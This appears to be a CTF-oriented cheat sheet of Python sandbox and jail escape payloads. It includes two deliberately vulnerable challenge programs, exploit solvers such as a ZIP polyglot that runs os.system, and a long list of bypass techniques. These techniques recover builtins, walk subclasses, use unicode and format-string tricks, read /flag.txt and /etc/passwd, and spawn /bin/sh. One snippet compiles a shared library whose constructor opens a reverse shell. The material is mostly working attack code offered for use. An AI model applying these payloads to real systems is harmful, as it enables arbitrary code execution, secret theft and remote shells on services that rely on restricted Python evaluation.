Python Cheat Sheets

import string

source = """#!/usr/bin/env python3 
# We would like to extend our sincere apologies due to the fiasco
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
\"\"\"
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
\"\"\"

# Extra safety, make sure no code is run:
quit()

def wish_printer():
    # 
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)
"""

lines = source.split('\n')

ALLOWED_CHARACTERS = string.ascii_letters + string.digits + string.punctuation + ' '

# Loop over lines and let user edit comments:
for i, line in enumerate(lines):
    if i == 0: # We ignore the shebang line of course
        continue
    if not line.lstrip().startswith('#'):
        continue
    print(f'Line {i} is a comment. Currently it is `{line}`. What would you like to append?')
    user_input = input('> ')
    if not all(c in ALLOWED_CHARACTERS for c in user_input):
        print('Make sure to not use any funky characters! We want readable comments!')
        continue
    new_line = line + user_input
    if len(new_line) > 72:
        print('Comment too long! Make sure to follow PEP-8!')
        continue
    lines[i] = new_line

# Write new file
new_python_file = '\n'.join(lines)
with open('commented_code.py', 'w') as wf:
    wf.write(new_python_file)

print(f"\nCommented code succesfully written to file. Here's the code:\n```\n{new_python_file}\n```\n")

# Let's make sure the file is not broken:
try:
    __import__('commented_code')
except SyntaxError as e:
    print('SyntaxError:', str(e))
    quit()

print('Yay, no errors! Thanks for commenting our code!')

Can be pwned

from pwn import *
import threading

payload1 = ['ding:hz', 'AAAAAA', 'AAAAA', 'ABCDEAAAAAAAAAAAAAAAAAAA', 'ABCDEFGHIJKLMAAAAAAAAAAAAAAAAA~', 'Aif __import__("os").system("ls -la") and True:']
payload2 = ['ding:hz', '~', '~', '', '~', 'asdfasdf']

def connect():
    return process(['python3', './server.py'], level='error')

def spam1():
    att = 0
    while True:
        att += 1
        if att % 100 == 0:
            print('thread1', att)
        conn = connect()
        for v in payload1:
            conn.sendline(v.encode())
        res = conn.recvuntil(b'Thanks').decode()
        if 'total' in res:
            print(res)
            exit()
        conn.close()

def spam2():
    att = 0
    while True:
        att += 1
        if att % 100 == 0:
            print('thread2', att)
        conn = connect()
        for v in payload2:
            conn.sendline(v.encode())
        res = conn.recvuntil(b'Thanks').decode()
        if 'total' in res:
            print(res)
            exit()
        conn.close()

thread1 = threading.Thread(target=spam1)
thread2 = threading.Thread(target=spam2)

thread1.start()
thread2.start()

thread1.join()
thread2.join()

#!/usr/bin/env python3
import tempfile
import subprocess
import os
 
comment = input("> ").replace("\n", "").replace("\r", "")
 
code = f"""print("hello world!")
# This is a comment. Here's another:
# {comment}
print("Thanks for playing!")"""
 
with tempfile.NamedTemporaryFile(mode="w", suffix=".py", delete=False) as f:
    f.write(code)
    temp_filename = f.name
 
try:
    result = subprocess.run(
        ["python3", temp_filename], capture_output=True, text=True, timeout=5
    )
 
    if result.stdout:
        print(result.stdout, end="")
    if result.stderr:
        print(result.stderr, end="")
 
except subprocess.TimeoutExpired:
    print("Timeout")
finally:
    os.unlink(temp_filename)

Can be pwned

# https://www.analogue.computer/blog/python-zip-confusion
# https://www.hacktron.ai/blog/python-zip-confusion
import io, struct, zipfile, pathlib
import itertools
import zlib
import subprocess
 
JUNK_HEAD = """print("hello world!")
# This is a comment. Here's another:
# """.encode()
JUNK_TAIL = """
print("Thanks for playing!")"""
 
FILENAME = b"__main__.py"
BODY     = b"__import__('os').system('whoami')#"
 
def ascii_safe(x: int) -> bool:
    """True if all four bytes have high bit clear."""
    return all(((x >> (8 * i)) & 0x80) == 0 for i in range(4))
 
def find_suffix(core: bytes, length: int = 4) -> bytes:
    """Brute-force an ASCII suffix of given length making CRC 32 valid."""
    printable = range(0x20, 0x7F)         # space … tilde
    for tail in itertools.product(printable, repeat=length):
        payload = core + bytes(tail)
        crc     = zlib.crc32(payload) & 0xFFFFFFFF
        if ascii_safe(crc):
            return bytes(tail), crc
    raise RuntimeError("unexpected: no suffix found")
 
SUFFIX, CRC = find_suffix(BODY)
PAYLOAD     = BODY + SUFFIX
SIZE        = len(PAYLOAD)
 
def le32(x): return struct.pack("<I", x)
def le16(x): return struct.pack("<H", x)
 
SIG_LFH  = 0x04034B50
SIG_CDH  = 0x02014B50
SIG_EOCD = 0x06054B50
 
# --------------------------------------------------------------------
# build the ZIP file
# --------------------------------------------------------------------
 
delta = len(JUNK_HEAD)
 
# Local file header
lfh  = le32(SIG_LFH)
lfh += le16(0)          # version needed to extract
lfh += le16(0)          # general purpose bit flag
lfh += le16(0)          # compression method = stored
lfh += le16(0)          # last mod file time
lfh += le16(0)          # last mod file date
lfh += le32(CRC)
lfh += le32(SIZE)       # compressed size
lfh += le32(SIZE)       # uncompressed size
lfh += le16(len(FILENAME))
lfh += le16(0)          # extra field length
lfh += FILENAME
 
# Central directory header
cdh  = le32(SIG_CDH)
cdh += le16(0)          # version made by
cdh += le16(0)          # version needed
cdh += le16(0)          # flags
cdh += le16(0)          # method
cdh += le16(0)          # time
cdh += le16(0)          # date
cdh += le32(CRC)
cdh += le32(SIZE)
cdh += le32(SIZE)
cdh += le16(len(FILENAME))
cdh += le16(0)          # extra len
cdh += le16(0)          # comment len
cdh += le16(0)          # disk #
cdh += le16(0)          # int attrs
cdh += le32(0)          # ext attrs
cdh += le32(delta)      # relative offset of LFH
cdh += FILENAME
 
# patch CD offset to make it ASCII safe
cd_offset = delta + len(lfh) + len(PAYLOAD)
 
pad = 0
while not ascii_safe(cd_offset + pad):
    pad += 1
padding = b'\x00' * pad
 
cd_offset += pad
 
# end of central directory record
eocd  = le32(SIG_EOCD)
eocd += le16(0)         # disk #
eocd += le16(0)         # disk where CD starts
eocd += le16(1)         # # entries on this disk
eocd += le16(1)         # total # entries
eocd += le32(len(cdh))  # size of central directory
eocd += le32(cd_offset) # offset of CD
eocd += le16(len(JUNK_TAIL)) # ZIP comment length
 
zip_bytes = lfh + PAYLOAD + padding + cdh + eocd
zip_bytes = bytearray(zip_bytes)
assert all(b < 0x80 for b in zip_bytes), "non-ASCII byte detected!"
 
# --------------------------------------------------------------------
# solve the challenge
# --------------------------------------------------------------------
 
with open("polyglot.zip", "wb") as f:
    f.write(JUNK_HEAD + zip_bytes + JUNK_TAIL.encode())
 
# Run locally: feed the payload to test/main.py via stdin
proc = subprocess.run([
    "python",
    "main.py",
], input=zip_bytes.decode('latin-1'), text=True, capture_output=True)
if proc.stdout:
    print(proc.stdout, end="")
if proc.stderr:
    print(proc.stderr, end="")

@exec
@input
def a():pass
Can be class

for 𝘱𝘢𝘵𝘩 in {lambda _: "flag.txt"}:
    @print
    @list
    @open
    @path
    class z:
        pass

@__import__("os").system
@input
class _: pass

@eval
@'__import__\x28"os"\x29.system\x28"whoami"\x29'.format
class _:pass

# can be chained with \r
@print\\r@set\\r@open\\r@input\\rclass\\x0ca:pass

help.__repr__.__globals__["sys"].modules["os"].environ.__setitem__("PYTHONINSPECT", "1")
help.__repr__.__builtins__["__import__"]('antigravity', help.__repr__.__builtins__["setattr"](help.__repr__.__builtins__["__import__"]('os'),'environ',{}.__class__(BROWSER='/bin/sh -c "cat /flag.txt" #%s')))

__import__("ctypes")._sys -> <module 'sys' (built-in)>
__import__("ctypes")._os  -> <module 'os' from '/usr/lib/python3.10/os.py'>

$ objectwalker -m jinja2 --filter-module os --max-depth 15
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.bccache.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.environment.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.loaders.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.utils.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.async_utils.inspect.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.bccache.fnmatch.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.bccache.tempfile._os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.clear_caches.__globals__["os"]
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.filters.random._os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.is_undefined.__globals__["os"]
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.loaders.posixpath.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.nodes.inspect.os
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.pass_context.__globals__["os"]
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.pass_environment.__globals__["os"]
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.pass_eval_context.__globals__["os"]
[FilterTypeIsModule] [module=os] [module_type=package] | jinja2.select_autoescape.__globals__["os"]

# Leak datas 
SECRET = 'YOUGOTME'

class User():
    def __init__(self, id, username):
        self.id = id
        self.username = username
    def __repr__(self):
        return '<User {u.username} (id {{i.id}})>'.format(u=self).format(i=self) # format string injection
user = User(0, '{i.__init__.__globals__[SECRET]}')

# Can RCE 
open("/tmp/lib.c", "wb").write(b"""#include <stdlib.h>\\n__attribute__((constructor))\\nvoid init() {\\nsystem("python3 -c \\\\"import os; import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('localhost', 1234)); fd = s.fileno(); os.dup2(fd, 0); os.dup2(fd, 1); os.dup2(fd, 2); os.system('/bin/sh')\\\\"");\\n}""")
import os
os.system("gcc -shared -fPIC /tmp/lib.c -o lib.so")
print("{0.__init__.__globals__[__loader__].load_module.__globals__[sys].modules[ctypes].cdll[/tmp/lib.so]}".format(user))

breakpoint() # pdb -> import os; os.system("sh")
exec(input()) # import os; os.system("sh")
eval(input()) # __import__("os").system("sh")

help() # less pager -> !/bin/sh
help() # less pager -> :e/flag.txt

assert len(set( [ *open("/flag.txt"), open("/flag.txt").read(), set(open("/flag.txt")).pop() ] )) == 1

# to stderr
int(*open("/flag.txt"))
float(*open("/flag.txt"))
complex(*open("/flag.txt"))
exit(set(open("/flag.txt")))
exit(*open("/flag.txt"))
open(*open("/flag.txt"))
compile(".","/flag.txt","exec")
raise Exception(*open("/flag.txt"))

# to stdout
help(*open("/flag.txt"))
print(*open("/flag.txt"))
type("", (), {"__init__": lambda s: print(open("flag.txt").read())})()
memoryview(open("flag.txt", "rb").read()).tobytes()

# to stdin
input(*open("/flag.txt"))

# https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help-and-license
license._Printer__filenames = ['/flag.txt']; license()
[license() for _ in [license._Printer__filenames in [['/flag.txt']]]]

# Normal
print("hello")

# hex escapes
print("\x68\x65\x6c\x6c\x6f")

# octal escapes
print("\150\145\154\154\157")

# unicode code points
print("\u0068\u0065\u006c\u006c\u006f")
print("\U00000068\U00000065\U0000006c\U0000006c\U0000006f")

# Only with builtins
print(().__doc__[56] + ().__doc__[17] + ().__doc__[3] + ().__doc__[3] + ().__doc__[34])
print(().__doc__[56].__add__(().__doc__[17].__add__(().__doc__[3].__add__(().__doc__[3].__add__(().__doc__[34])))))


print(chr(ord('ʚ')-ord('ȫ'))+chr(ord('ř')-ord('æ'))+chr(ord('ř')-ord('æ'))+chr(ord('ȉ')-ord('ơ')))

print(10)

print(True + True + True + True + True + True + True + True + True + True)
print((()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())) # work also with [] & {} & ...
print(((()==())<<(()==())<<(()==())<<(()==()))|((()==())<<(()==()))) # ((1<<1<<1<<1) | (1<<1)) = 8 | 2 = 10
print(len(str(...))+str(()))

# exit - fonctionne car c'est une instance de Quitter
exit.__class__.__add__ = exec; exit + "import os; os.system('whoami')"
quit.__class__.__add__ = exec; quit + "__import__('os').system('whoami')"

# license - instance de _Printer  
license.__class__.__add__ = exec; license + "print(open('/etc/passwd').read())"
credits.__class__.__add__ = exec; credits + "__import__('os').system('pwd')"
copyright.__class__.__add__ = exec; copyright + "exec(input())"

# help - instance de _Helper
help.__class__.__sub__ = exec; help - "__import__('os').system('ls')"

class X: pass
x = X()
x.__class__.__add__ = exec; x + "__import__('os').system('id')"

# obtain builtins from a globally defined built-in functions
# https://docs.python.org/3/library/functions.html
print.__self__
__build_class__.__self__
__import__.__self__

# obtain builtins from site-module constants
# https://docs.python.org/3/library/constants.html#constants-added-by-the-site-module
help.__call__.__builtins__ # or __globals__
help.__repr__.__globals__["sys"] # can chain with sys.modules
license.__repr__.__builtins__ # or __globals__
license.__repr__.__globals__["sys"] # can chain with sys.modules

# obtain the builtins from a defined function
func.__globals__['__builtins__']
(lambda:...).__globals__

# obtain builtins from generators
(_ for _ in ()).gi_frame.f_builtins
(_ for _ in ()).gi_frame.f_globals["__builtins__"]
(await _ for _ in ()).ag_frame.f_builtins
(await _ for _ in ()).ag_frame.f_globals["__builtins__"]
[*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in (1,))) or x[0] for x in [[]]][0])][0]["__builtins__"]

# Can be obtained from the type of the object
# https://robertchen.cc/blog/2018/07/27/tjctf18-abyss
async def code(): pass
ftype = type(lambda: None)
ctype = type(code().cr_code)
get_classes = ftype(ctype(1, 0, 1, 1, 67, b'i\x00j\x00j\x01j\x02\x83\x00S\x00', (None,), ('__class__', '__base__', '__subclasses__'), ('a',), 'aaa.py', 'get_classes', 7, b'\x00\x01', (), ()), {})
get_module = ftype(ctype(1, 0, 1, 1, 67, b'|\x00j\x00S\x00', (None,), ('_module',), ('warning_catcher',), 'aaa.py', 'get_module', 10, b'\x00\x01', (), ()), {})
classes = get_classes('')
warnings = classes[160]()
module = get_module(warnings)
os=module.sys.modules["os"]
os.system("cat /flag.txt")

# https://lingojam.com/ItalicTextGenerator

# no ASCII
𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵() # import os;os.system("/bin/sh")

# no ASCII letters, no double underscores, inside eval
_＿𝘪𝘮𝘱𝘰𝘳𝘵＿_(𝘪𝘯𝘱𝘶𝘵()).system(𝘪𝘯𝘱𝘶𝘵()) # double underscore bypass by having underscore + unicode underscore (https://www.compart.com/en/unicode/U+005F) -> U+FE33, U+FE34, U+FE4D, U+FE4E, U+FE4F, U+FF3F

# no ASCII letters, no double underscores, no builtins, inside eval
()._＿𝘤𝘭𝘢𝘴𝘴＿_._＿𝘮𝘳𝘰＿_[1]._＿𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴＿_()[104].𝘭𝘰𝘢𝘥_𝘮𝘰𝘥𝘶𝘭𝘦("\\157\\163").𝘴𝘺𝘴𝘵𝘦𝘮("\\57\\142\\151\\156\\57\\163\\150")

# no ASCII letters, no double underscores, no builtins, no quotes/double quotes inside eval (>= python3.8)
[𝘺:=()._＿𝘥𝘰𝘤＿_,𝘢:=y[19],()._＿𝘤𝘭𝘢𝘴𝘴＿_._＿𝘮𝘳𝘰＿_[1]._＿𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴＿_()[104].𝘭𝘰𝘢𝘥_𝘮𝘰𝘥𝘶𝘭𝘦(𝘺[34]+𝘢).𝘴𝘺𝘴𝘵𝘦𝘮(𝘢+𝘺[56])]

# no ASCII letters, no double underscores, no builtins, no quotes/double quotes, no square brackets inside eval (>= python3.8)
(𝘥:=()._＿𝘥𝘰𝘤＿_,d:=()._＿dir＿_().__class__(d),𝘴:=𝘥.𝘱𝘰𝘱(19),𝘥._＿𝘤𝘭𝘢𝘴𝘴＿_(()._＿𝘤𝘭𝘢𝘴𝘴＿_._＿𝘮𝘳𝘰＿_).𝘱𝘰𝘱(1)._＿𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴＿_().𝘱𝘰𝘱(104).𝘭𝘰𝘢𝘥_𝘮𝘰𝘥𝘶𝘭𝘦(𝘥.𝘱𝘰𝘱(33)+𝘴).𝘴𝘺𝘴𝘵𝘦𝘮(𝘴+𝘥.𝘱𝘰𝘱(54)))

# no double underscores, no builtins, no quotes/double quotes, no parenthesis inside eval, has existing object (>= python3.8)
class cobj:...
obj = cobj()

[d:=[]._＿doc＿_,o:=d[32],s:=d[17],h:=d[54],[obj[s+h] for obj._＿class＿_._＿getitem＿_ in [[obj[o+s] for obj._＿class＿_._＿getitem＿_ in [[+obj for obj._＿class＿_._＿pos＿_ in [[]._＿class＿_._＿mro＿_[1]._＿subclasses＿_]][0][104].load_module]][0].system]]]

# https://gist.github.com/0poss/ddf033ee64e82e3d899bd631f12729c1
exc = BaseException

for filterdigit in exc(lambda x: (c for c in x if c.isdigit())).args: pass

for getgen in exc(lambda x: exc(x).args).args: pass

for filtercurly in exc(lambda x: (c for c in x if not c.isalnum() and not c.isalpha() and c.isascii() and not c.isdecimal() and not c.isdigit() and not c.isidentifier() and not c.islower() and not c.isnumeric() and c.isprintable() and not c.isspace() and not c.istitle() and not c.isupper())).args: pass

for filterdot in exc(lambda x: (c for c in x if c.isprintable() and c.isascii() and not (c.isalpha() or c.isdigit() or c.isalnum() or c.isspace() or c.islower() or c.isupper() or c.isidentifier() or c.isdecimal() or c.isnumeric()))).args: pass

try: import fakeimportforunderscore
except exc as excunderscore:
    for underscore in (c for c in excunderscore.msg if not (c.isalpha() or c.isspace())): pass

try: zero0
except exc as exczero0:
    for zero in filterdigit(exczero0.name): pass

try: one1
except exc as excone1:
    for one in filterdigit(excone1.name): pass

try: two2
except exc as exctwo2:
    for two in filterdigit(exctwo2.name): pass

try: three3
except exc as excthree3:
    for three in filterdigit(excthree3.name): pass

try: five5
except exc as excfive5:
    for five in filterdigit(excfive5.name): pass

try: six6
except exc as excsix6:
    for six in filterdigit(excsix6.name): pass

try: seven7
except exc as excseven7:
    for seven in filterdigit(excseven7.name): pass

try: eight8
except exc as exceight8:
    for eight in filterdigit(exceight8.name): pass

try: ascii
except exc as excascii:
    for ascii in getgen(excascii.name): pass

try: utf
except exc as excutf:
    for utf in getgen(excutf.name): pass

try: cp
except exc as exccp:
    for cp in getgen(exccp.name): pass

try: be
except exc as excbe:
    for be in getgen(excbe.name): pass

for utf16 in getgen(utf + underscore + one + six): pass

for utf16be in getgen(utf16 + underscore + be): pass

for utf8 in getgen(utf + eight): pass

for cp1026 in getgen(cp + one + zero + two + six): pass

for cp037 in getgen(cp + zero + three + seven): pass

for cp875 in getgen(cp + eight + seven + five): pass

try: d
except exc as excd:
    for d in getgen(excd.name): pass
for opencurly in filtercurly(d.encode(ascii).decode(cp037).encode(utf16).decode(cp037)): pass

try: c
except exc as excc:
    for c in getgen(excc.name): pass
for closecurly in filtercurly(c.encode(utf16).decode(utf16be).encode(utf8).decode(cp1026)): pass

try: h
except exc as exch:
    for h in getgen(exch.name): pass
for opensquare in h.encode(ascii).decode(cp1026): pass

try: a
except exc as exca:
    for a in getgen(exca.name): pass
for closesquare in filtercurly(a.encode(utf16).decode(cp875).encode(utf8).decode(cp037)): pass

try: lass
except exc as exclass:
    for clas in getgen(c + exclass.name): pass

try: base
except exc as excbase:
    for base in getgen(excbase.name): pass

try: subclasses
except exc as excsubclasses:
    for subclasses in getgen(excsubclasses.name): pass

try:
    async def fn():
        while aucuneimportance:
            yield aucuneimportancenonplus
    fn().asend()
except exc as excasync:
    for excasyncarg in excasync.args: pass

try: o
except exc as exco:
    for o in getgen(exco.name): pass

try: s
except exc as excs:
    for s in getgen(excs.name): pass

try: h
except exc as exch:
    for h in getgen(exch.name): pass

try:
    for dot in filterdot(excasyncarg):
        (opencurly + zero + dot + underscore + underscore + clas + underscore + underscore + dot + underscore + underscore + base + underscore + underscore + dot + underscore + underscore + subclasses + underscore + underscore + dot + d+d+d+d+d+d+d+d+d + closecurly).format(())
except exc as excsubclassesfn:
    for subclasses in getgen(excsubclassesfn.obj()): pass

try: builtins
except exc as excbuiltins:
    for builtins in getgen(excbuiltins.name): pass

try: init
except exc as excinit:
    for init in getgen(excinit.name): pass

try: imp
except exc as excimp:
    for imp in getgen(excimp.name): pass
try: ort
except exc as excort:
    for ort in getgen(excort.name): pass

for subclass in subclasses:
    try:
        (opencurly + zero + dot + underscore + underscore + init + underscore + underscore + dot + underscore + underscore + builtins + underscore + underscore + opensquare + underscore + underscore + imp+ort + underscore + underscore + closesquare + closecurly).format(subclass)
    except: continue

    try:
        (opencurly + zero + dot + underscore + underscore + init + underscore + underscore + dot + underscore + underscore + builtins + underscore + underscore + opensquare + underscore + underscore + imp+ort + underscore + underscore + closesquare + dot + d+d+d+d+d+d+d + closecurly).format(subclass)
    except exc as excfnimport:
        for fnimport in getgen(excfnimport.obj): pass
    fnimport(o+s).system(s+h)
    break

# list comprehension (exec & eval)
[+obj for obj.__class__.__pos__ in ["".__class__.__subclasses__]]
[obj["print(123)"] for obj.__class__.__getitem__ in [eval]]

# from builtin modules (exec & eval) - <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>
[f"{license}" for license._Printer__setup in [breakpoint]]

# Some other ways to bypass the parenthesis
[f"{copyright}" for copyright.__class__.__str__ in [breakpoint]]
[+license for license.__class__.__pos__ in [breakpoint]]
[-quit for quit.__class__.__neg__ in [breakpoint]]
[help["ls"] for help.__class__.__getitem__ in [system]]
[[copyright.sh]for[[[copyright.__class__.__getattr__]]]in[[[[copyright.os.system]for[copyright.__class__.__getattr__]in[[__import__]]]]]]
[[help[quit[license]]]for[help.__class__.__getitem__]in[[eval]for[quit.__class__.__getitem__]in[[input]]]]
[[[help[quit[[]]]]for[quit.__class__.__getitem__]in[[input]]]for[help.__class__.__getitem__]in[[eval]]]

# @hashkitten (exec)
from os import system as __getattr__; from __main__ import sh

# ADD - String Addition
exit.__class__.__add__ = exec; exit + "import os; os.system\x28'whoami'\x29"
# SUB - String Subtraction
exit.__class__.__sub__ = exec; exit - "import os; os.system\x28'whoami'\x29"
# MUL - String Multiplication
exit.__class__.__mul__ = exec; exit * "import os; os.system\x28'whoami'\x29"
# DIV - String Division
exit.__class__.__div__ = exec; exit / "import os; os.system\x28'whoami'\x29"
# MOD - String Modulo
exit.__class__.__mod__ = exec; exit % "import os; os.system\x28'whoami'\x29"

# property bypass
class Test:
   @property
   def aFunction(self):
        print("you called this function")
test = Test()
test.aFunction